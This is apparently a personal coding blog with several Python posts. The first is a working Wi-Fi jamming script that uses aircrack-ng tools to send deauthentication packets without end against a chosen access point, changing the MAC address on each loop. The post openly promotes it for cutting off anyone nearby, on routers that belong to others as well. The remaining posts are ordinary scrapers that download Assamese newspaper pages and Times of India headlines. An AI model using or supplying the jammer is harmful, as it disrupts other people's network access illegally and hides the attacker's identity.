Saturday 10 December 2016

python script for ddosing wifi near by

This script will make sure that no body  near you can use wifi , whether router belong to you or some body else . Using this script you can jam all the wifi signals so that no can use it .


import os
import time
os.system('ifconfig wlan0 down')
os.system('iwconfig wlan0 mode monitor')
os.system('ifconfig wlan0 up')
os.system('airmon-ng check kill')
os.system('airmon-ng check kill')
print 'Select the bssid to attack: \nPress Ctl+c to stop'
time.sleep(2)
os.system('airodump-ng wlan0')
a=raw_input('Now provide me the bssid you want to ddos: ')
b=int(raw_input('Now provide at what channal is working: '))
os.system('iwconfig wlan0 channel %i'%b)
while True:
    os.system('aireplay-ng -0 5  -a %s wlan0'%a)
    os.system('ifconfig wlan0 down')
    os.system('macchanger  wlan0 -A')
    os.system('ifconfig wlan0 up')



you will get result like bellow :






Connect With Me: Facebook

Saturday 26 November 2016

python API for assamese news papers Pratidin

python API for assamese news papers Pratidin

Recently this news site has changed their way of publishing new . So this one is new way to drag their papers to your pc .


URL: http://www.asomiyapratidin.in/


import os,requests,bs4
os.system('rm -vfr *_pratidin*')
t=raw_input('date formate 22-11-2016: ')
os.system('mkdir %s_pratidin'%t)
os.chdir('%s_pratidin'%t)
a=requests.get('http://www.asomiyapratidin.in/np-images/small/%s/'%t)
r=bs4.BeautifulSoup(a.content)
r.find_all('a')
for i in range(len(r.find_all('a'))):
        os.system('mkdir %i'%(i+1))
        os.chdir('%i'%(i+1))
        c=requests.get('http://www.asomiyapratidin.in/np-images/small/27-12-2016/%i/'%(i+1))
        d=bs4.BeautifulSoup(c.content)
        for e in range(len(d.find_all('a'))):
                os.system('wget http://www.asomiyapratidin.in/np-images/small/27-12-2016/%i/%i.jpg'%(i+1,e+1))
        os.chdir('../')




or


import os,requests,bs4
os.system('rm -vfr *_pratidin*')
t='27-12-2016'
#t=raw_input('date formate 22-11-2016: ')
os.system('mkdir %s_pratidin'%t)
os.chdir('%s_pratidin'%t)
a=requests.get('http://www.asomiyapratidin.in/np-images/small/%s/'%t)
r=bs4.BeautifulSoup(a.content)
r.find_all('a')
for i in range(len(r.find_all('a'))):
        os.system('mkdir %i'%(i+1))
        os.chdir('%i'%(i+1))
        c=requests.get('http://www.asomiyapratidin.in/np-images/small/27-12-2016/%i/'%(i+1))
        d=bs4.BeautifulSoup(c.content)
        for e in range(len(d.find_all('a'))):
                os.system('wget http://www.asomiyapratidin.in/np-images/small/27-12-2016/%i/%i.jpg'%(i+1,e+1))
        os.chdir('../')



Bellow is a ss how it will work .




Connect With Me: Facebook

python API for assamese news papers

Today i will scrap news from some of the news agencies. You can download  news papers without visiting the news sites .

URLs
1.http://ganaadhikar.com/
2.http://www.dainikagradoot.com
3.http://www.assamtribune.com
4.http://dainikjanambhumi.co.in
5.http://www.assamiyakhabor.com
6.http://www.asomiyapratidin.in
7.http://www.assamtribune.com

Overall 7 Assamese news papers i m  going to use for experiment .

1.গনঅধিকাৰ :


import os
a=raw_input('Give me the date of paper_like 22112016:')
os.system('rm -vfr gana')
os.system('mkdir gana')
os.chdir('gana')
for i in range(1,13):
        os.system('wget http://ganaadhikar.com/%s/pages/page%s.gif'%(a,i))



2.দৈনিক অগ্ৰদোত:

import os
os.system('rm -vfr agradut')
os.system('mkdir agradut')
os.chdir('agradut')
for i in range(1,15):
        os.system('wget http://www.dainikagradoot.com/pages/page%d.pdf'%i)

3. দৈনিক অসম :

 import os
a=raw_input('Date formate nov2216 :')
os.system('rm -vfr dainik_asom')
os.system('mkdir dainik_asom')
os.chdir('dainik_asom')
for i in range(1,16):
        os.system('wget http://www.assamtribune.com/DA/2016/%s/BigPage%d.jpg'%(a,i))

4.অসমীয়া খবৰ :

import os,bs4
os.system('rm -vfr khabar_gy')
os.system('mkdir khabar_gy')
os.chdir('khabar_gy')
for i in range(1,15):
        os.system(' wget http://www.assamiyakhabor.com/publishfinal/asset/guwahati/current/pages/ghy%d.png'%i)
        os.system(' wget http://www.assamiyakhabor.com/publishfinal/asset/guwahati/current/pages/ghy%d.jpg'%i)


5.প্ৰতিদিন :

import os , bs4,requests
os.system('rm -vfr *_pratidin*')
a1=requests.get('http://www.asomiyapratidin.in')
r=bs4.BeautifulSoup(a1.content)
os.system('clear')
a=raw_input('Print the date for which you want the news paper : Ex: 19-11-2016 ')
os.system('mkdir %s_pratidin'%a)
os.chdir('%s_pratidin'%a)
c=len(r.find_all("div",{"id":"page-thumbnails"})[0].find_all('a'))+1
for i in range(1,c):
        os.system('wget http://www.asomiyapratidin.in/np-images/medium/ap-%s-%d.jpg'%(a,i))
os.system('clear')
for i in range(1,19):
        try:
                os.system('convert %s_pratidin/ap-%s-$d.jpg -resize 50% ap-%s-$d.jpg'%(a,a,i,a,i))
        except:
                pass

6.Assamtribune:

 import os
a=raw_input('Date formate nov2216 :')
os.system('rm -vfr tribune')
os.system('mkdir tribune')
os.chdir('tribune')
for i in range(1,17):
        os.system('wget http://www.assamtribune.com/at/2016/%s/BigPage%d.jpg'%(a,i))


Bellow is a screen shot .





Connect With Me: Facebook




Friday 18 November 2016

The Times of India News API

Today i will create a API which will bring you news from The Tim es of India news services .

URL used: http://timesofindia.indiatimes.com



This script will bring almost all the news data from this site .

Main Script :


import os , bs4,requests
b=requests.get('http://timesofindia.indiatimes.com/')
r=bs4.BeautifulSoup(b.content)
os.system('clear')
print 'Bellow are Lattest News:\n'
print r.find_all("ul",{"class":"list9"})[0].text.replace('\n\n','')
raw_input('Press Enter to go ahead: ')
os.system('clear')
print'\nLinks are given bellow:\n\n'
for i in r.find_all("ul",{"class":"list9"})[0].find_all('a'):
        print i.get('href')
raw_input('Press Enter to go ahead: ')
os.system('clear')
print '\nNews FROM ACROSS THE TIMES OF INDIA:\n'
for i in r.find_all("ul",{"data-vr-zone":"across_toi"})[0].find_all('a'):
        print i.text
raw_input('Press Enter to go ahead: ')
os.system('clear')
print'\nLinks are given bellow:\n\n'
for i in r.find_all("ul",{"data-vr-zone":"across_toi"})[0].find_all('a'):
        print i.get('href')
raw_input('Press Enter to go ahead: ')
os.system('clear')
print "Bellow is the TOP NEWS STORIES:"
print r.find_all("ul",{"class":"list8"})[0].text.replace('\n\n','')
raw_input('Press Enter to go ahead: ')
os.system('clear')
for i in r.find_all("ul",{"class":"list8"})[0].find_all('a'):
        print i.get('href')
raw_input('Press Enter to go ahead: ')
os.system('clear')
print 'Bellow is news from ENTERTAINMENT:'
for i in r.find_all("ul",{"class":"list8"})[1]:
        print i.text
raw_input('Press Enter to go ahead: ')
os.system('clear')
print 'Bellow are the links:'
for i in r.find_all("ul",{"class":"list8"})[1].find_all('a'):
        print i.get('href')
os.system('clear')
print '-----------------THE END---------------------'


Some of the output are given bellow :




Connect With Me: Facebook

Popular Posts